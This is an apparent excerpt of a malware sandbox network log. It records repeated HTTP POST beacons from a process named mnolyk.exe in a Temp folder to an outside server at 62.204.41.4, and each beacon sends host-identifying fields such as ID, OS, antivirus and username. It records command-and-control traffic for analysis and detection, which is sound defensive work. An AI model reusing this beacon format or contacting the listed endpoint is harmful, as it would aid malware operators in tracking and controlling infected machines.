Feb 7, 2023 19:57:49.660384893 CET	357	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
153	192.168.2.5	49861	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:49.861421108 CET	358	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:49.924356937 CET	358	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
154	192.168.2.5	49862	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:50.104681969 CET	359	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:50.169972897 CET	359	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
155	192.168.2.5	49863	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:50.367777109 CET	360	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:50.431555033 CET	360	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
156	192.168.2.5	49864	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:50.603717089 CET	361	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:50.666523933 CET	361	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
157	192.168.2.5	49865	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:50.851457119 CET	362	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:50.916224957 CET	362	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
158	192.168.2.5	49866	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:51.087084055 CET	363	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:51.150449991 CET	363	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
159	192.168.2.5	49867	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:51.323673010 CET	364	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:51.387584925 CET	364	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.5	49713	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:09.809087992 CET	112	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:09.872056961 CET	112	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
160	192.168.2.5	49868	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:51.563260078 CET	365	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:51.627196074 CET	365	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
161	192.168.2.5	49869	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:51.811173916 CET	366	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:51.875149965 CET	366	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
162	192.168.2.5	49870	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:52.051772118 CET	367	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:52.117147923 CET	367	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
163	192.168.2.5	49871	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:52.296228886 CET	368	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:52.360213041 CET	368	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
164	192.168.2.5	49873	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:52.544612885 CET	369	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:52.608648062 CET	370	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
165	192.168.2.5	49874	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:52.779347897 CET	376	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:52.842753887 CET	377	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
166	192.168.2.5	49875	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:53.010906935 CET	377	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:53.076116085 CET	378	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
167	192.168.2.5	49876	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:53.245417118 CET	378	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:53.308866024 CET	379	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
168	192.168.2.5	49877	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:53.477790117 CET	379	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:53.539478064 CET	380	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
169	192.168.2.5	49878	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:53.715010881 CET	380	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:53.780524015 CET	381	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.5	49714	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:10.084490061 CET	113	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:10.148363113 CET	113	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
170	192.168.2.5	49879	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:53.960320950 CET	381	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:54.024262905 CET	382	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
171	192.168.2.5	49880	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:54.223862886 CET	382	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:54.293271065 CET	383	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
172	192.168.2.5	49881	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
